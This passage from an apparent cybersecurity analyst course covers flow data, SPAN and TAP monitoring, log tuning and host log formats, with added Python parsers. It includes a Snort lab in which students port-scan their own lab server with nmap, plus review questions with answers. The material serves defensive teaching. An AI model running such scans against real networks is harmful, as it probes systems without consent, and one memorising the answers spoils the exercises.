then applying a classification scheme to those systems to detect network traffic that deviates from
baseline levels. This can provide you with a more robust ability to detect anomalies—anomalies that
may suggest an incident. SDN therefore gives you a high-level perspective of network flow that may
not be possible with traditional network management controls.
up

Network Traffic and Flow Data

Network traffic and flow data may come from a wide variety of sources, such as web proxies,
routers, firewalls, network sniffers, and so forth. Any of these may provide good sources of security
intelligence. Logs from these sources can reveal anomalies, such as outages; configuration changes;
suspicious changes in traffic patterns, such as flash crowds; and other patterns of abuse.

Network traffic and flow analysis tools can provide automated analysis of network traffic and flow
data, providing features such as:
• Reporting on traffic and flow, including trending patterns based on traffic generated by certain
applications, hosts, protocols, and so forth.
• Alerts based on detection of anomalies, flow analysis patterns, and custom triggers you can
define.
• Integrated secure packet capture and storage capabilities.
• Visualization tools that enable you to quickly create a map of network connections, and interpret
patterns of traffic and flow data.
• Identification of traffic patterns revealing rogue user behavior, malware in transit, tunneling,
applications exceeding their allocated bandwidth, and so forth.
• Verifying that sensitive data is being transmitted in an encrypted form, and detecting any
sensitive data that flows in plaintext.


Many free and commercial network traffic and flow analysis tools are available, with names like
NetFlow, J-Flow, sFlow, ManageEngine NetFlow Analyzer, SolarWinds NetFlow Traffic Analyzer,
Multi Router Traffic Grapher (MRTG), Cacti, and ntop.
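Flow records carry no payload, only who talked to whom, over which protocol and port, and how much; the list of features above (per-host and per-protocol trending, bandwidth overages, plaintext services) is what an analyst derives from those few fields. The following is an added example, not from the course or from any of the tools named above, of three of those derivations over constructed flow records: bytes per host against a per-host baseline, flows to well-known cleartext services, and the share of traffic per protocol and port. The `FLOWS` records, the `BASELINE_BYTES` table and the `PLAINTEXT_SERVICES` port list are assumptions made for this example; a flow collector would export the same fields from NetFlow, sFlow or J-Flow.

```python
from collections import defaultdict

# Constructed flow records: (src, dst, proto, dst_port, bytes_sent). Not real traffic.
FLOWS = [
    ("10.0.0.5", "198.51.100.20", "tcp", 443, 120_000),
    ("10.0.0.5", "198.51.100.30", "tcp", 23, 4_000),
    ("10.0.0.9", "203.0.113.40", "tcp", 443, 52_000_000),
    ("10.0.0.9", "10.0.0.1", "udp", 53, 1_500),
    ("10.0.0.12", "198.51.100.20", "tcp", 80, 900_000),
    ("10.0.0.12", "10.0.0.1", "udp", 53, 2_000),
]

# Constructed per-host baseline: bytes each host sent in a comparable earlier period.
BASELINE_BYTES = {"10.0.0.5": 150_000, "10.0.0.9": 2_000_000, "10.0.0.12": 1_000_000}

# Well-known cleartext services; a flow to one of these is where sensitive data
# could travel in plaintext and deserves a closer look.
PLAINTEXT_SERVICES = {21: "ftp", 23: "telnet", 80: "http", 110: "pop3", 143: "imap"}


def bytes_per_host(flows):
    """Total bytes sent per source host."""
    totals = defaultdict(int)
    for src, _, _, _, nbytes in flows:
        totals[src] += nbytes
    return dict(totals)


def bandwidth_outliers(flows, baseline, factor=3.0):
    """Hosts sending more than `factor` times their baseline; hosts with no baseline are reported too."""
    out = []
    for host, total in sorted(bytes_per_host(flows).items()):
        base = baseline.get(host)
        if base is None or total > factor * base:
            out.append((host, total, base))
    return out


def plaintext_flows(flows):
    """(src, dst, service) for every TCP flow to a well-known cleartext service port."""
    return [(src, dst, PLAINTEXT_SERVICES[port]) for src, dst, proto, port, _ in flows
            if proto == "tcp" and port in PLAINTEXT_SERVICES]


def protocol_mix(flows):
    """Share of total bytes per (proto, dst_port), the trending view a flow tool reports."""
    total = sum(f[4] for f in flows)
    mix = defaultdict(int)
    for _, _, proto, port, nbytes in flows:
        mix[(proto, port)] += nbytes
    return {k: round(v / total, 3) for k, v in mix.items()}


if __name__ == "__main__":
    print(bandwidth_outliers(FLOWS, BASELINE_BYTES))
    print(plaintext_flows(FLOWS))
    print(protocol_mix(FLOWS))
```

In the sample, one host sends some 26 times its baseline to a single external address over 443, which is the kind of "application exceeding its allocated bandwidth" or possible data exfiltration the bullet list points at; the telnet and HTTP flows are the plaintext cases. Because the volume check is relative to each host's own history, a busy file server does not trip it merely for being busy.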

Figure 7-8: Network flow data logs.

SPAN Ports and TAP Devices

Security systems that monitor live network traffic typically use one of two approaches: SPAN or
TAP. It's important to familiarize yourself with the differences between the two, as those differences
have an effect on the data you receive for analysis, as well as the overall performance penalties the
monitoring process has on the network.

Switch port analyzer (SPAN) is an approach in which a network appliance (e.g., a switch or
router) takes the network packets that flow to and from one main port (or virtual local area network
[VLAN]) on the device, then copies those packets to another port (the mirror port). The mirror port
then forwards the copied packets to the network monitoring system. The amount of network traffic
the SPAN port "sees" is dependent on where it sits between other network devices and hosts.
SPAN ports are easy to configure remotely, but their critical disadvantage is the amount of overhead
they add to the network. Having to duplicate packets can lead to congestion, which in turn can lead
to the SPAN port changing frame timings or dropping entire packets.
Test access point (TAP) is not a port on an existing device, but a dedicated device itself. The TAP
device sits between network appliances, often between a switch and router, and forwards both
incoming and outgoing packets between those appliances to a security monitoring system. The
packets are still sent between the switch and the router like normal, but they are also copied to
separate monitoring ports on the TAP device (one port for incoming traffic, one for outgoing).
Since the TAP device is a separate appliance, it will not cause any frame timings to be altered or
packets to be dropped. Also, forensic data captured through a TAP device is admissible in court in
certain jurisdictions, whereas data captured from SPAN devices may not be.
Despite their performance and reliability issues, SPAN ports are still useful for monitoring low-
traffic network segments. Otherwise, TAP devices are the preferred option, as they don't cause the
same performance degradation and even have some security benefits.


Figure 7-9: SPAN architecture vs. TAP architecture.



Log Tuning

Whether you're collecting firewall logs, IDS/IPS logs, syslogs, or any type of logging data, you'll
often need to strike a balance between the volume of information and the usefulness of that
information. The consequences of failing to log enough pertinent data may be a reduced ability to
identify and correct problems, but logging too much data could lead to another set of issues.
Excessive logging might increase network and processing overhead, and depending on how the data
is collected, it might take up too much storage memory on hosts. It might also make the task of
analysis overly complex.

That's why it's important to tune your logs to make them as optimal as possible at providing you
with useful and actionable information. This is much more ideal than your logs being an unwieldy
resource that you reluctantly wade through to only maybe find something of value. The tuning
process can take time, however, as you need to evaluate what logs weren't collected but should have
been, and what logs were collected but should not have been. Once you've reached a point where
you're confident you've achieved the right balance, log tuning will have made your job easier and
more productive.

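One concrete tuning control that keeps the signal while cutting the volume is an event limit: pass the first N alerts for a given signature and source in each time window and only count the rest. The following is an added example of that control, not part of the course and not Snort's own implementation (Snort provides this kind of limiting through its configuration; this standalone version just shows the mechanics). The alert tuples, the epoch base `T0`, the limit of 5 and the 1800-second window are constructed for the example.

```python
from collections import defaultdict


class AlertLimiter:
    """Keep the first `limit` alerts per (signature, source) in each fixed window; count the rest.

    The window for a key starts at the first alert seen for it and restarts once
    `seconds` have elapsed, so a source that keeps firing is still reported once
    per window instead of being silenced forever.
    """

    def __init__(self, limit=5, seconds=1800):
        self.limit, self.seconds = limit, seconds
        self._windows = {}                  # (sig, src) -> [window_start, passed_in_window]
        self.suppressed = defaultdict(int)  # (sig, src) -> alerts dropped, for the tuning report

    def offer(self, ts, sig, src):
        """Return True if the alert should be kept, False if it is suppressed."""
        key = (sig, src)
        win = self._windows.get(key)
        if win is None or ts - win[0] >= self.seconds:
            win = self._windows[key] = [ts, 0]
        if win[1] < self.limit:
            win[1] += 1
            return True
        self.suppressed[key] += 1
        return False


def tune(alerts, limit=5, seconds=1800):
    """Apply the limiter to a time-ordered list of (ts, sig, src); return (kept, suppressed_counts)."""
    limiter = AlertLimiter(limit, seconds)
    kept = [a for a in alerts if limiter.offer(*a)]
    return kept, dict(limiter.suppressed)


# Constructed alert stream: one source fires the same signature every 30 s for four
# minutes, another source fires once, and the first source returns after 30 minutes.
T0 = 1_709_640_000  # arbitrary epoch base for the constructed data
ALERTS = sorted(
    [(T0 + 30 * i, 9000001, "203.0.113.9") for i in range(8)]
    + [(T0 + 100, 9000001, "192.0.2.7"), (T0 + 1800, 9000001, "203.0.113.9")])


if __name__ == "__main__":
    kept, suppressed = tune(ALERTS)
    print(f"kept {len(kept)} of {len(ALERTS)} alerts; suppressed per key: {suppressed}")
```

The suppressed counts are the part that makes this tuning rather than blind filtering: a key with a large count tells you the rule is noisy for that source and either needs refining or the source needs attention, which is exactly the "collected but should not have been" review the text describes.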

ACTIVITY 7-2
Collecting Network-Based Security Intelligence

Data Files

C:\CNX0013Data\Collecting Cybersecurity Intelligence\snort.conf
C:\CNX0013Data\Collecting Cybersecurity Intelligence\local.rules

Before You Begin

You'll be using your Windows Server® 2019 computer for this activity, as well as your Kali Linux™
virtual machine (VM). Snort has already been installed on the server.

Note: If your network configuration does not use 10.39.5.0/24, you will have to change the
var HOME_NET value in snort.conf for students.

Scenario

One of the primary ways you intend to gather security intelligence in the Develetech network is to
employ an IDS. You decide to begin your investigation of IDSs by looking at Snort—an established,
respected, and free IDS. You'll run the system on your Windows Server and write some basic rules
to test its ability to detect port scans.

1. Set up Snort to begin detecting scans.
a) On your Windows Server, from the course data files, copy the snort.conf file to the C:\Snort\etc
directory, overwriting the file that is already there.
b) Copy the local.rules file to the C:\Snort\rules directory.
c) Open the local.rules file using WordPad.




d) Observe the four rules in the file.

The first detects SYN scans, the second detects ACK scans, the third detects XMAS scans, and the
fourth detects a web browser navigating to Facebook.
Each rule has a header and a body. The header includes the action, protocol, source IP address,
source port, direction, target IP address, and target port. The body must include at least an identifier
called a security identifier (SID) and a message called msg. Any line starting with a # is a comment
line in Snort. For example, alert icmp any any -> $HOME_NET any (SID: 9000009;
msg: "ICMP Detected") would alert on every incoming Internet Control Message Protocol
(ICMP) packet it saw (primarily ping and traceroute). This would not be a very efficient rule, because
it would trigger all the time.

Note: Explain the difference between the various types of flags that might be set in a packet, if
students are unfamiliar with them.

The bottom four lines in the rule file limit the output of the four rules so they will only show the first
five alerts from a particular IP address every 30 minutes.

Note: There are many other optional fields to filter on in the body, but they
could fill a separate course. For extensive documentation and to check out
this free program, go to https://snort.org.

Note: HOME_NET is a variable that is set in your snort.conf file to the local
network IP addresses.
e) Close the local.rules file without saving.

2. Begin capturing data with Snort.
a) Open PowerShell by right-clicking the Start button and selecting Windows PowerShell (Admin).
b) At the prompt, enter cd C:\Snort\bin
This is the default directory where the Snort executable resides.
c) Enter .\snort.exe -W


d) Identify the index of the network interface that has your server's IP address.

Note: The correct index on your server may be different than what's shown in the screenshot.
e) Enter .\snort -c C:\Snort\etc\snort.conf -i# -l C:\Snort\log -A console, where # is the network interface index you just identified.
• The -c option tells Snort where to find the configuration file.
• The -i# option tells Snort to capture on the specific interface.
• The -l option tells Snort to log its alerts and where to save them.
• The -A console option tells Snort to additionally send the alerts to the console. You would not use this option normally because it slows down detection and may cause Snort to drop packets in a busy network. Sending data to the console is a good way to test your sensor.
When you execute the command, the console should show a large number of actions ending with "Commencing packet processing." This indicates Snort is actively detecting intrusions.

f) Switch to your Kali Linux VM, open a terminal prompt, and enter sudo nmap -A 10.39.5.#, where # is the last number in the IP address of your Windows Server.

Note: -A combines a SYN scan, ACK scan, and operating system discovery.
g) Allow the scan to complete, and then check the Snort command prompt on your Windows Server 2019 computer.
There should be five SYN scan alerts, five ACK scan alerts, and five XMAS scan alerts.


h) With the PowerShell window active, press Ctrl+C to end the capture.
Notice that Snort displays summary data about the attack.

3. How many TCP packets did Snort examine?
A: Answers will vary, but the number will be large, typically in the thousands.

Instructor note: If students are unsure, have them run Wireshark on the server as they do the Nmap scan.

4. Why do you think there were only five instances of each alert in the traffic?
A: The limits placed in the rules file show only the first five instances of each alert within a 30-minute period.

5. Why limit the number of alerts?
A: To not overwhelm your IDS with traffic and fill your logs with just a few loud attacks like this one.

6. When might you want to temporarily see every instance of an alert?
A: For analysis purposes once you know an attack is coming.

7. Examine your log file in Wireshark.

Note: In this mode, Snort captures entire packets and saves them in a file that is readable with Wireshark or other protocol analyzers.
a) On your Windows Server system, start Wireshark from the desktop.
b) From the File menu, select Open.
c) In the Wireshark ⋅ Open Capture File window, navigate to C:\Snort\log.
d) Select the snort.log file saved there and select Open.


e) Examine the captured packets, noting those containing FIN, PSH, and URG flags in particular.

Note: XMAS scans are a way to evade some firewalls that track TCP sessions. They are malformed packets containing the PuSH, URGent, and FINish flags.

8. Were all of the XMAS scans identical? If not, how were they different?
A: No, some have just FIN, PSH, and URG, while the others include the SYN flag. Three of them are marked by Wireshark as retransmissions.

9. Disable the alert limits and rerun the Snort capture.
a) Open the C:\Snort\rules\local.rules file in WordPad.
b) At the bottom of the file, type a # in front of each of the event commands to comment out these rules and disable them in the next scan.
c) Save and close the local.rules file.
d) Run the Snort scan again as in step 2e.
e) Go to your Kali Linux system and run the sudo nmap -A scan of the server again.

10. How is the output in the command prompt different?
A: There are many more alerts. So many that it constantly scrolls.

11. After the scan completes, end the Snort session by pressing Ctrl+C and look at the statistics.

Instructor note: All of the scans from Nmap may not run because it remembers the results from the last scan, but the difference should still be obvious.


12. Is the number of TCP packets (or other statistics) significantly different from the previous scan?
A: No, the numbers are about the same. Snort just alerted on more of the malicious traffic than before.

13. Why is it important to carefully tune and limit your IDS rules in a production environment?
A: To limit the number of alerts that are logged for the same attack and make sure that actual attacks do not get lost in false positives. Storage space can also be a concern if a great deal of data is logged over a period of time.

14. Close PowerShell and Wireshark.
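As an added example (not code from the course data files), the following Python parses rules written in Snort's header/body syntax and reproduces the "first five alerts per source address every 30 minutes" behavior that the event limit lines at the bottom of local.rules impose, which is what questions 4 through 6 and 13 are about. The three rules and the event_filter line are constructed for this example and need not match the real local.rules file; the sample alert stream is constructed as well.

```python
"""Parse Snort-style rules and apply a 'type limit' event filter.

Added example; the rules and event_filter below are constructed and are not
the contents of the course's local.rules file."""
import re

# Constructed rule file in Snort 2 syntax. Header: action proto src sport dir
# dst dport; body in parentheses. Lines starting with # are comments.
RULES = r'''
# flags:S = only SYN set, flags:A = only ACK, flags:FPU = FIN+PSH+URG (XMAS)
alert tcp any any -> $HOME_NET any (flags:S; msg:"SYN scan"; sid:9000001;)
alert tcp any any -> $HOME_NET any (flags:A; msg:"ACK scan"; sid:9000002;)
alert tcp any any -> $HOME_NET any (flags:FPU; msg:"XMAS scan"; sid:9000003;)
# Log only the first 5 alerts per source address in each 30-minute window
event_filter gen_id 1, sig_id 9000001, type limit, track by_src, count 5, seconds 1800
'''

HEADER_RE = re.compile(
    r'^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+'
    r'(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<body>.*)\)\s*$')


def parse_rule(line):
    """Return the seven header fields plus a dict of body options."""
    m = HEADER_RE.match(line)
    if not m:
        raise ValueError("not a rule: " + line)
    rule = {k: m.group(k) for k in
            ('action', 'proto', 'src', 'sport', 'dir', 'dst', 'dport')}
    options = {}
    for opt in m.group('body').split(';'):
        opt = opt.strip()
        if opt:
            key, _, val = opt.partition(':')
            options[key.strip()] = val.strip().strip('"')
    if 'sid' not in options or 'msg' not in options:
        raise ValueError("sid and msg are required: " + line)
    rule['options'] = options
    return rule


def parse_event_filter(line):
    """Turn 'event_filter gen_id 1, sig_id N, type limit, ...' into a dict."""
    fields = dict(part.split() for part in line[len('event_filter'):].split(','))
    for key in ('gen_id', 'sig_id', 'count', 'seconds'):
        fields[key] = int(fields[key])
    return fields


def load_rules(text):
    """Skip blank and commented lines; separate rules from event filters."""
    rules, filters = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('event_filter'):
            flt = parse_event_filter(line)
            filters[flt['sig_id']] = flt
        else:
            rules.append(parse_rule(line))
    return rules, filters


class LimitFilter:
    """type limit, track by_src: pass the first `count` alerts from each
    source address in every `seconds`-long window and drop the rest."""

    def __init__(self, count, seconds):
        self.count, self.seconds = count, seconds
        self.windows = {}  # source address -> (window start, alerts seen)

    def allow(self, src, ts):
        start, seen = self.windows.get(src, (None, 0))
        if start is None or ts - start >= self.seconds:
            start, seen = ts, 0  # open a new window
        seen += 1
        self.windows[src] = (start, seen)
        return seen <= self.count


def apply_filters(alerts, filters):
    """alerts: (timestamp in seconds, sid, source address) tuples in time
    order per sid. Returns the alerts that would actually be logged."""
    state = {sid: LimitFilter(f['count'], f['seconds'])
             for sid, f in filters.items()}
    return [a for a in alerts
            if a[1] not in state or state[a[1]].allow(a[2], a[0])]


def count_logged(rule_text, alerts):
    """Number of logged alerts per sid after applying the file's filters."""
    _, filters = load_rules(rule_text)
    counts = {}
    for _, sid, _ in apply_filters(alerts, filters):
        counts[sid] = counts.get(sid, 0) + 1
    return counts


if __name__ == '__main__':
    # Constructed scan: 40 SYN-rule alerts and 7 ACK-rule alerts from one
    # host within a minute, then one more SYN alert 30 minutes later.
    scan = ([(t, 9000001, '10.39.5.50') for t in range(40)]
            + [(t, 9000002, '10.39.5.50') for t in range(7)]
            + [(1800, 9000001, '10.39.5.50')])
    print(count_logged(RULES, scan))  # {9000001: 6, 9000002: 7}
    # Commenting out the event_filter line (activity step 9) logs every alert.
    print(count_logged(RULES.replace('event_filter', '# event_filter'), scan))
```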


TOPIC C
Collect Data from Host-Based Intelligence Sources
Now that you've collected intelligence from network-based sources, you can turn your attention to host-based sources.

Operating System Log Data

Instructor note: You don't need to spend too much time teaching through each log format in depth; you might instead highlight the differences between each format.

Systems such as Microsoft® Windows, Apple® macOS®, and Linux keep a variety of logs as users and software interact with the system. The format of the logs varies depending on the system. Information contained within the logs also varies by system, and in many cases, the type of information that is captured can be configured.
System logs contain information such as:
• Valid and invalid authentication attempts and resource use, such as creating, opening, or deleting files.
• When applications and services are started and stopped, and any errors that occurred.
• Remote access.
• Driver failures and hardware problems.
• Account and security policy changes.
Many of these logs contain information that can be useful in detecting or responding to security problems. In many cases, administrators refer to these logs only when there is a problem, relying on default configurations to maintain the logging they need. However, you can customize the system logging feature or install third-party logging tools to collect more (or more useful) information. Of course, this must be done in advance to take advantage of it.

System logs are helpful when investigating problems involving a specific host. For example, if an NIDS reveals an attack against a particular computer, the system logs for that computer could be analyzed to determine if a user was logged in to the computer when the attack occurred.

Windows Event Logs

Instructor note: The next lesson discusses Event Viewer and goes into more detail about Windows event logging.

By default, Windows constantly records events it considers significant to the execution of the operating system. This can be everything from an application crashing to a user logging in to the system. As such, Windows can record thousands of events over a period of weeks, depending on how often the system is used and for what purpose. Typically, events provide information that can be valuable to the troubleshooting process. These events can also be used as security intelligence to ascertain exactly what happened on a system at a certain point in time.
When events are generated, they are placed into log categories. These categories describe the general nature of the events or what areas of the OS they affect. The five main categories of Windows event logs are:
• Application: Events generated by applications and services, such as ones failing to start.
• Security: Audit events, such as failed logons.
• Setup: Events generated during the installation of Windows.
• System: Events generated by the operating system and its services, such as storage volume health checks.
• Forwarded Events: Events that are forwarded to the computer from other computers.


Figure 7-10: Errors in the System event log.

Syslog Data

The syslog format has become a de facto standard for logging in Unix-like systems, such as Linux. Syslog logging is typically provided through a simple centralized logging infrastructure that provides a common interface for log entry generation, storage, and transfer. Syslog is a TCP/IP protocol and can run on nearly any operating system. It is a bare-bones method used to communicate logs to another system. It usually uses UDP port 514.
The typical syslog infrastructure consists of:
• Clients: Services and applications that need to log events send a message to a server, which may be on a different host computer.
• Server: The syslog server listens for messages sent over the network.
• Storage: The server may store messages in flat files or in a database.
• Management and filtering software: Log management or filtering software accesses records in storage and provides tools for filtering, viewing, or managing data.
Clients identify the importance or priority of each logging message by including a code for facility and severity:
• Facility identifies the affected system by using a short keyword such as "kern" (operating system kernel), "mail" (mail system), or "auth" (authentication or security). The facility may also be shown as a number from 0 to 23, each of which maps to an affected system (e.g., "kern" maps to 0).
• Severity values are a number from 0 (most critical) to 7 (not critical).
These codes help security analysts and analysis software determine which messages should be handled most quickly. For example, you might configure a monitoring service to send a notification to the administrator for all operating system kernel messages of severity levels 1 or 0.

Note: In order for facility and severity to appear directly in the syslog, you may need to configure a template that uses these components in the /etc/rsyslog.conf file.


Figure 7-11: Sample syslog data. Most entries have a severity of 6, meaning the entry is informational. A facility of 3 refers to system daemons.
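An added example, not part of the course, that decodes the priority value (PRI) prefixed to each syslog message as it travels on the wire: PRI is the facility number multiplied by 8 plus the severity, so 30 is facility 3 (daemon) with severity 6 (informational), the combination the figure above shows. The notification policy implements the "kernel messages of severity 1 or 0" rule from the text; the log lines are constructed.

```python
"""Decode syslog PRI values and apply a severity-based notification policy.

Added example; the log lines below are constructed."""
import re

# RFC 5424 facility codes 0-23 and severity codes 0-7 (0 = most critical)
FACILITIES = ['kern', 'user', 'mail', 'daemon', 'auth', 'syslog', 'lpr', 'news',
              'uucp', 'cron', 'authpriv', 'ftp', 'ntp', 'security', 'console',
              'clock'] + ['local%d' % i for i in range(8)]
SEVERITIES = ['emerg', 'alert', 'crit', 'err', 'warning', 'notice', 'info', 'debug']

# <PRI> followed by the classic timestamp, hostname, tag and message text
LINE_RE = re.compile(r'^<(?P<pri>\d{1,3})>(?P<rest>.*)$')


def decode_pri(pri):
    """PRI = facility * 8 + severity, so divide and take the remainder."""
    if not 0 <= pri <= 191:
        raise ValueError("PRI out of range: %d" % pri)
    return FACILITIES[pri // 8], SEVERITIES[pri % 8]


def parse_line(line):
    """Return the decoded fields, or None when the line carries no PRI."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pri = int(m.group('pri'))
    facility, severity = decode_pri(pri)
    return {'pri': pri, 'facility': facility, 'facility_num': pri // 8,
            'severity': severity, 'severity_num': pri % 8,
            'message': m.group('rest').strip()}


def needs_notification(entry, facility='kern', max_severity=1):
    """The policy from the text: notify on kernel messages of severity 1 or 0."""
    return (entry is not None and entry['facility'] == facility
            and entry['severity_num'] <= max_severity)


def triage(log_text):
    """Parse every line; return (decoded entries, entries needing notification)."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e is not None]
    return entries, [e for e in entries if needs_notification(e)]


# Constructed sample: 30 = daemon.info, 38 = auth.info, 1 = kern.alert,
# 13 = user.notice, 0 = kern.emerg, 4 = kern.warning, last line has no PRI
SAMPLE_LOG = """\
<30>Mar  1 10:15:22 srv01 systemd[1]: Started Daily apt download activities.
<38>Mar  1 10:15:40 srv01 sshd[2231]: Accepted publickey for alice from 10.39.5.20 port 51234 ssh2
<1>Mar  1 10:16:03 srv01 kernel: [12345.678] Out of memory: Killed process 2240 (java)
<13>Mar  1 10:16:10 srv01 backup: nightly job finished
<0>Mar  1 10:16:44 srv01 kernel: [12386.001] NMI watchdog: hard LOCKUP on cpu 3
<4>Mar  1 10:17:01 srv01 kernel: [12400.000] usb 1-1: device descriptor read/64, error -71
Mar  1 10:17:05 srv01 legacy-app: line without a PRI header
"""

if __name__ == '__main__':
    entries, urgent = triage(SAMPLE_LOG)
    for e in entries:
        print('%-8s %-7s %s' % (e['facility'], e['severity'], e['message'][:50]))
    print('notify administrator for %d entries' % len(urgent))  # 2
```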
Syslog Drawbacks
The original syslog protocol has some drawbacks. Using UDP delivery protocols does not ensure delivery, so messages could be lost in a congested network. Also, it does not provide basic security controls to ensure confidentiality, integrity, and availability of log data. Messages are not encrypted in transit or in storage, and any host can send data to the syslog server, so an attacker could cause a DoS by flooding the server with misleading data. A man-in-the-middle attack could destroy the integrity of message data.
In response to these shortcomings, newer syslog implementations introduced security features, many of which are captured in the Requests for Comments (RFC) 3195, 5424, 5425, 5426, which include:
• The ability to use TCP for acknowledged delivery, instead of unacknowledged delivery over UDP (port 514). There is no consistent TCP port that is used.
• The ability to use Transport Layer Security (TLS) to encrypt message content in transit. This uses port 6514 regardless of whether it's TCP or UDP.
• Ensuring the reliability of syslog transmissions using Reliable Event Logging Protocol (RELP), which formats syslog data in XML. This uses port 601.
• Protecting the integrity of message content through authentication and a hashing algorithm such as Secure Hash Algorithm (SHA).
Syslog implementations may also provide additional features beyond those specified in the RFCs, such as message filtering, automated log analysis capabilities, event response scripting (so you can send alerts through email or text messages, for example), and alternative message formats (such as SNMP).

Application Logs

In addition to system-level logs, you can configure and monitor application logs to obtain more specific information about activities performed on the host. This includes browsers, collaboration tools, and other end-user applications; databases; financial applications; custom business applications; and other applications critical to the organization or that contain sensitive information. It also includes services such as email servers, Simple Mail Transfer Protocol (SMTP) gateways, file servers, web servers, DNS servers, and Dynamic Host Configuration Protocol (DHCP) servers. Some applications provide their own logs, while others use system logs to record data.
Some information, particularly for applications that use encrypted communication, can only be logged by the application itself. For this reason, application logs can be useful for auditing and compliance, and for investigating security incidents related to specific misuse of application data. Unfortunately, application logs tend to be in proprietary formats, with highly contextual data that makes an analysis more complicated.
The following are some of the types of information you might obtain from application logs.

Client requests and server responses: Server or client applications typically log a high-level description of each request and response (though not the actual content), which can help to reconstruct communication timelines, determine who made each request, and provide the type of response returned. Server applications can provide detailed logging, such as the sender, recipients, title, and attachments for each email, or each URL requested and the response provided by a web server. Business applications can identify which financial records were accessed by users.

Account information: Server applications may log events concerning specific user accounts, such as successful and failed logins and account changes (such as creation, deletion, and privilege assignment). In addition to identifying security events such as brute-force password guessing and escalation of privileges, account information can be used to identify who has used the application and when each person has used it.

Usage information: Information about application usage, such as the number of transactions within a certain time period or the transaction size (such as the size of an email message), can be helpful when monitoring security. A sudden increase in the size or frequency of certain transactions might indicate specific types of security threats.

Significant operational events: Applications can log events such as an application startup and shutdown, application failures, and major application configuration changes. This can be used to identify security compromises and operational failures.

HIDS/HIPS logs: A host-based intrusion detection and prevention system (HIDS/HIPS) can log anomalous behavior with regard to how an application executes. Slow execution, repeated crashes, or other odd behavior may indicate a compromise. Additionally, an HIDS/HIPS often comes with an integrity checker that can detect when a file on a computer is modified from its preset baseline.

Anti-malware logs: Anti-malware/antivirus applications may also provide useful insights into how malicious software impacts a system.

DNS Event Logs

A DNS server may log an event each time it handles a request to convert between a domain name and an IP address.
DNS event logs can contain a variety of information that may provide useful security intelligence, such as:
• The types of queries a particular computer has made to DNS.
• A list that can be searched for either IP addresses or domains to identify computers that are in communication with suspicious sites.
• Statistical anomalies such as spikes or consistently large numbers of DNS lookup failures, which may point to computers infected with malware, misconfigured, or running obsolete or faulty applications.

Figure 7-12: A DNS event log.

SMTP Logs

Simple Mail Transfer Protocol (SMTP) is a protocol used in email communications. Mail applications send messages in SMTP format to their relay server (e.g., an on-premises Exchange server), which then forwards the SMTP-formatted message to the recipient's mail server (e.g., one of Gmail's servers). The recipient's mail server then typically formats the message in Post Office Protocol 3 (POP3) or Internet Message Access Protocol (IMAP) before forwarding it on to the recipient.

SMTP logs are typically formatted in request/response fashion: the local SMTP server sends a request to the remote SMTP server to open a port for communications. The remote SMTP server responds and, if successful, the local server begins forwarding the client's message. The logs at this point typically record the time of request/response, the address of the recipient, and the size of the message.

Another component of SMTP log entries is the status code. Status codes indicate a remote server's acceptance or rejection of a request or message. For example, the remote server may send code 220 after a request, indicating that the server is ready. After the local server provides the message information, the remote server responds with code 250 to indicate the message itself is accepted. Likewise, you can use SMTP logs to collect errors in transmissions that may indicate insecure email activity. Code 421 in a remote server's response indicates the service is not available, and codes 450, 451, and 452 each indicate different issues with sending the actual message. Repeated failure entries like these could be the sign of a DoS condition on either the remote or local SMTP server.
Note: For a full list of SMTP reply codes, navigate to www.serversmtp.com/en/smtp-error.
Figure 7-13: An SMTP log entry example. A session with a remote server has already been established, but the remote server is unable to deliver the message.


HTTP Logs
Web servers are typically configured to log HTTP traffic that encounters an error or traffic that matches some predefined rule set. Most web servers use the Common Log File (CLF) format to record the relevant information. The CLF standardizes fields so they appear in the following order:
• The IP address of the client making the request.
• The RFC 1413 identity of the client (rarely used).
• The user ID of the client when authenticated on the site.
• The date and time the request was received, as well as the time zone.
• The request method used by the client (e.g., GET or POST) and the resource requested.
• The HTTP status code of the server's response.
• The size, in bytes, of the resource returned to the client.

Figure 7-14: An example of an HTTP log entry. The hyphens indicate information that is not available.
The status code of a response can reveal quite a bit about both the request and the server's behavior. Codes in the 400 range indicate client-based errors, whereas codes in the 500 range indicate server-based errors. For example, repeated 403 ("Forbidden") responses may indicate the server is rejecting a client's attempts to access resources they are not authorized to. A 502 ("Bad Gateway") response could indicate that communications between the target server and its upstream server are being blocked, or that the upstream server is down.

Note: For a list of HTTP status codes, navigate to www.restapitutorial.com/httpstatuscodes.html. This list may not be exhaustive, as some vendors have their own status codes.
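An added example, not from the course, that parses entries in the CLF field order listed above (treating the hyphen as "not available"), classifies status codes into the 400 and 500 ranges, and picks out a client that keeps receiving 403 responses, the pattern the text calls out. The log lines are constructed.

```python
"""Parse Common Log Format (CLF) entries and flag repeated 403 responses.

Added example; the log lines are constructed."""
import re
from collections import Counter
from datetime import datetime

# CLF field order: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$')


def parse_clf(line):
    """Return a dict of the CLF fields; a '-' field becomes None."""
    m = CLF_RE.match(line)
    if not m:
        raise ValueError("not a CLF entry: " + line)
    d = m.groupdict()
    d['ident'] = None if d['ident'] == '-' else d['ident']
    d['user'] = None if d['user'] == '-' else d['user']
    d['size'] = None if d['size'] == '-' else int(d['size'])
    d['status'] = int(d['status'])
    # e.g. 12/Mar/2020:13:55:36 -0500 (the %z keeps the time zone)
    d['time'] = datetime.strptime(d['time'], '%d/%b/%Y:%H:%M:%S %z')
    # the request line is "METHOD resource protocol"
    parts = d['request'].split()
    d['method'] = parts[0] if len(parts) >= 2 else None
    d['resource'] = parts[1] if len(parts) >= 2 else d['request']
    return d


def status_class(code):
    """Client-side (4xx) versus server-side (5xx) failures, as in the text."""
    if 400 <= code < 500:
        return 'client error'
    if 500 <= code < 600:
        return 'server error'
    return 'success/redirect' if 200 <= code < 400 else 'other'


def repeated_forbidden(entries, threshold=3):
    """Clients that received at least `threshold` 403 (Forbidden) responses."""
    counts = Counter(e['host'] for e in entries if e['status'] == 403)
    return {host: n for host, n in counts.items() if n >= threshold}


def summarize(log_text, threshold=3):
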